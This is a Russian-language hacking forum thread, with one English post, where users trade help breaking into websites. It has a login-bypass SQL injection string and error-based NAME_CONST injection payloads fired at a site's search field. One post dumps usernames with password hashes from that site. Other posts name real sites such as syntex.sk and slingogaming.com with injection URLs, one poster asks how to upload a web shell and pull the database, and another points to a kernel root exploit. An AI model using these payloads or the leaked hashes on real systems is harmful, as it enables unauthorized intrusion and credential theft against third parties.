DrakonHaSh не работат. там есть заглушка на случай если файла нет на hdd, вот она показывается на data и php filter. возможно там пхп <5 версии, ~сайт крутится давно, да и форум на старой ipb
Проще некуда. В поле логин: Code: [B]' or 1= 1 -- [/B] Без плюсов, только чистые пробелы. Здравствуйте, Глеб. =)
а поле серч хекается при запросе Code: xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1 добавление : Ну короче поахал себе мозг, вот что вышло table : users (id,login.password) gleb:609562b36985b13c69167ed9b3525c0a VS:016d36db759cbd97f97b8f44d1586020 и т.д. С хешами я хз, все вместились или нет запрос Code: xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((SELECT/**/password/**/from/**/users/**/limit/**/3,1),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((SELECT/**/password/**/from/**/users/**/limit/**/3,1),14)e)b)a)/**/and/**/'1'='1 вообще вот )
Помогите вывести версию БД. http://www.syntex.sk/novinky.php?od=75+and+substring(version(),1,1)=5 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/html/syntex.sk/public_html/novinky.php on line 34
По моему там чтото типа такого: SELECT * FROM mytable where od='.mysql_real_escape_string($_GET['od']).'; Поэтому когда ты ставишь ковычку или чтото ещё то запрос возвращает просто пустой результат) там нет проверки mysql_num_rows, поэтому это не скуля
Помогите воспользоваться руткитом. Собираюсь получить права рут на Linux Kernel 2.6.5 Вроде бы нашел сплойт http://milw0rm.com/exploits/8556 А как воспользоваться чётко незнаю.
Ну, во-первых, это не руткит. А как использовать можно найти в блоге автора - http://kernelbof.blogspot.com/2009/04/kernel-memory-corruptions-are-not-just.html В частности для компиляции нужны хедеры libsctp (пакет libsctp-dev для дебиана, например).
PHP: $sql="INSERT INTO counter (ip,cookie,date) values('".$_SERVER['REMOTE_ADDR']."','".session_id()."',NOW())"; уязвим ли данный код?(mq-off)
Нет, даже при mq-on, и вообще при любых настройках. $_SERVER['REMOTE_ADDR'] не подменить PS Ну разумеется если никакой чудокодер не глобализует там реквест, к примеру (это я для любителей "особых условий", что-бы не было соблазнов показать как всё может быть круто )
Помогите определить CMS. Таблицы: cms_websites cms_users cms_user_settings cms_settings cms_sequence cms_sections cms_news_cat cms_document_stage cms_document_rollback cms_document cms_comm Или может кто знает путь в админпанель.
Url is vulnerable http://slingogaming.com/slingo_casino_news-story.php?id=-2+UNION+SELECT+1--+ problem is that i found admin panel http://slingogaming.com/admin/account/ and also admin username and email but password filed does not exit so now i want to upload shell on it and mysql.user: Host,User,Password also found so please now how can i upload shell on it OR get .sql Database
я так понимаю ты про то, что если этот чудокодер использует import_request_variables или extract, то передав скрипту параметр _SERVER[REMOTE_ADDR]=sql inj можно поиметь уязвимость ? кста, насчет "особых условий". разве весь процесс поиска уязвимостей это не есть поиск как раз именно этих особых условий ?
да процесс поиска уязвимостей в коде - иногда да процесс ответов на конкретные вопросы пользователей - нет linuxkernal Это русскоязычный форум, если тебе необходима помощь, будь добр переводить свои посты хотя-бы с помощью онлайн переводчиков, иначе я их буду тереть.